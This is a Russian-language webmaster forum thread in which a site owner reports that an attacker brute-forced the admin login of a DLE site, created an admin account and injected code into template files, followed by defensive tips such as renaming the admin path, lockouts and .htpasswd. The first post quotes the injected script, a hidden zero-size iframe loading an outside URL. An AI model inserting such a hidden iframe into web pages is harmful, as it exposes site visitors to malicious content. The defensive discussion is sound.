Скрыть объявление
ВАШИ ПРАВА ОГРАНИЧЕНЫ!

Зарегистрируйтесь на форуме, чтобы стать полноценным участником сообщества!

Дыра в dle ?

Тема в разделе "Вопросы- ответы", создана пользователем Driple, 21 янв 2017.

21.01.17 в 23:25
22.01.17 в 11:26
17
1.674
0
  1. TopicStarter Overlay
    Driple

    Команда форума VIP Кинотрафик v2

    Регистрация:
    23 дек 2015
    Сообщения:
    370
    Лучших ответов:
    0
    Рейтинги:
    +61 / 0 / -0
    копался случайно на своём сайте в разделе пользователей, и случайно обнаружил, что один из пользователей зарегил себе логин user и каким то образом оказался с правами администратора. Как такое может быть? и как он это сделал? получается есть какой-то баг, ведь под админом можно сделать всё что угодно .... https://yadi.sk/i/VjFrtigQ3ADZzm
    и как себя обезопасить?
    более того начал проверять ftp клиентом, какие файлы были редактированы, оказалось чел залез в fullstory.tpl и navigation.tpl и вставил следующий код
    <script>document.write('<iframe src="http://avnt.ru/swf.php" width="0" height="0" frameborder="0"></iframe>');</script>
     
  2. TopicStarter Overlay
    Driple

    Команда форума VIP Кинотрафик v2

    Регистрация:
    23 дек 2015
    Сообщения:
    370
    Лучших ответов:
    0
    Рейтинги:
    +61 / 0 / -0
    начал разбираться дальше, чел видимо подобрал пароль к логину admin, затем создал пользователя user, зачем-то и изменил 3 файла. https://yadi.sk/i/odGrvlAM3ADiiz
    потом начал смотреть Список действий в админпанели , логин admin я давно не пользуюсь, а по нему кто то периодически логинился.
     
  3. BROKER

    Забанен

    Регистрация:
    6 июн 2015
    Сообщения:
    1.564
    Лучших ответов:
    0
    Рейтинги:
    +1.132 / 0 / -0
    Я конечно извиняюсь и может я не прав но объясните мне пожалуйста ............. какого хуя вы вообще открываете регу ??? По моему уже отошли времена когда вебмастера выебывались своими базами зареганных людей друг перед другом, смысл от них? На всех сайтах закрыта рега и считаю что она по большому счету нахуй не кому не нужна, сейчас пользователи скотины ленивые пошли и им пальцем то лень пошевелить не то что регаться. Но даже если и зарегался юзер какая выгода и польза с этого?

    P.S. - я конечно не беру в расчет помешанных всяких людей на коллекционировании почтовых ящиков с дальнейшей рассылкой по ним с целью впарить какую нибудь хуйню :D
     
    • Нравится Нравится x 2
  4. TopicStarter Overlay
    Driple

    Команда форума VIP Кинотрафик v2

    Регистрация:
    23 дек 2015
    Сообщения:
    370
    Лучших ответов:
    0
    Рейтинги:
    +61 / 0 / -0
    @BROKER, открыл регу для постоянников, вырубил им рекламу, подумал что так будет лучше. Но они то брутили логины админа, поэтому открыта или закрыта рега уже не имеет значения
     
  5. Den

    Den
    Команда форума VIP Кинотрафик v2

    Регистрация:
    19 окт 2015
    Сообщения:
    2.129
    Лучших ответов:
    0
    Рейтинги:
    +1.004 / 6 / -0
    спасибо за новое слово :D
     
  6. BROKER

    Забанен

    Регистрация:
    6 июн 2015
    Сообщения:
    1.564
    Лучших ответов:
    0
    Рейтинги:
    +1.132 / 0 / -0
    Наверное открою тайну но для всяких таких уебанов нужно делать левую админку нерабочую и пусть ебутся брутят когда как рабочую нужно по другому пути прописывать, нерабочая мало того что хуй кого авторизует даже если и правильные данные введешь так еще и блочить будет как и рабочая админка.
     
  7. TopicStarter Overlay
    Driple

    Команда форума VIP Кинотрафик v2

    Регистрация:
    23 дек 2015
    Сообщения:
    370
    Лучших ответов:
    0
    Рейтинги:
    +61 / 0 / -0
    @BROKER, раскрывай дальше как её сделать, так, что бы была видимость авторизации?
     
  8. europa1988

    europa1988 Бывалый

    Регистрация:
    24 фев 2016
    Сообщения:
    613
    Лучших ответов:
    2
    Рейтинги:
    +113 / 11 / -0
    • Нравится Нравится x 1
  9. TopicStarter Overlay
    Driple

    Команда форума VIP Кинотрафик v2

    Регистрация:
    23 дек 2015
    Сообщения:
    370
    Лучших ответов:
    0
    Рейтинги:
    +61 / 0 / -0
    проверил остальные сайты, каждые 5-10 минут, идёт попытка взлома-подбора логин-пароля. это какой-то пизнец. людям нех заняться, лучше бы бабки зарабатывали (((
     
  10. ZerocooL

    Команда форума Администратор VIP Кинотрафик v2

    Регистрация:
    29 янв 2015
    Сообщения:
    8.679
    Лучших ответов:
    9
    Мануалы:
    31
    Рейтинги:
    +5.089 / 210 / -1
    там 100% добавлен код мобильной рекламы на вапклик!!!!
    чисть файлы. смотри прокрутку в право!
     
    • Нравится Нравится x 3
  11. Karburator

    Команда форума VIP Кинотрафик v2

    Регистрация:
    17 авг 2016
    Сообщения:
    963
    Лучших ответов:
    0
    Рейтинги:
    +298 / 7 / -0
    Двиг лизензия, или нуленый/хуеленый? :D:D
     
  12. Karburator

    Команда форума VIP Кинотрафик v2

    Регистрация:
    17 авг 2016
    Сообщения:
    963
    Лучших ответов:
    0
    Рейтинги:
    +298 / 7 / -0
    Пароль: 1111? 0000? или qwerty? М.б. просто когда-то, дал кому-то доступ и забыл сменить пассы?
     
  13. Avenger

    Avenger Бывалый

    Регистрация:
    10 сен 2015
    Сообщения:
    549
    Лучших ответов:
    2
    Рейтинги:
    +148 / 25 / -0
    Ты палишь мои пароли...
     
    • Нравится Нравится x 3
  14. byroot

    Забанен

    Регистрация:
    10 окт 2015
    Сообщения:
    12.297
    Лучших ответов:
    54
    Рейтинги:
    +5.205 / 74 / -0
    1. Меняй путь админки.
    2. Включи авторизацию только через соцсети (ВК/ФБ... есть почти у всех).
    3. Измени 20 минут блока на 2000 минут блокировки при неверно введенных 2-3 попытках:
    4. Удали всех админов кроме себя.
    5. Поставь фейк авторизации от вордпресса по адресу admin.php
     
    • Нравится Нравится x 1
  15. TopicStarter Overlay
    Driple

    Команда форума VIP Кинотрафик v2

    Регистрация:
    23 дек 2015
    Сообщения:
    370
    Лучших ответов:
    0
    Рейтинги:
    +61 / 0 / -0
    ночью пытались снова проникнуть, но меры принял :)
    странно что один ip с которого лезут, хостинги разные были у сайтов, переехал буквально как пару дней на общий. судя по регам, до переезда уже заходили в админку. совпадение ли ...
     
  16. damir

    Команда форума VIP Кинотрафик v2

    Регистрация:
    20 окт 2015
    Сообщения:
    2.155
    Лучших ответов:
    0
    Рейтинги:
    +962 / 1 / -0
    @Driple,
     
  17. TopicStarter Overlay
    Driple

    Команда форума VIP Кинотрафик v2

    Регистрация:
    23 дек 2015
    Сообщения:
    370
    Лучших ответов:
    0
    Рейтинги:
    +61 / 0 / -0
    @damir, лицензия с кейгеном
     
  18. aeneas

    Забанен

    Регистрация:
    12 мар 2016
    Сообщения:
    11.489
    Лучших ответов:
    10
    Рейтинги:
    +4.043 / 208 / -0
    @Driple, а если так ? -
    1. вход в админку закрыть .htpasswd
    2. все файлы шаблона поставить права 444
    у меня так и гемороя пока не было тьфу тьфу

    я думаю один .htpasswd спасет от всей ебаты, тока в нем пароль ставь не 123456 )
     
    • Нравится Нравится x 1
Яндекс.Метрика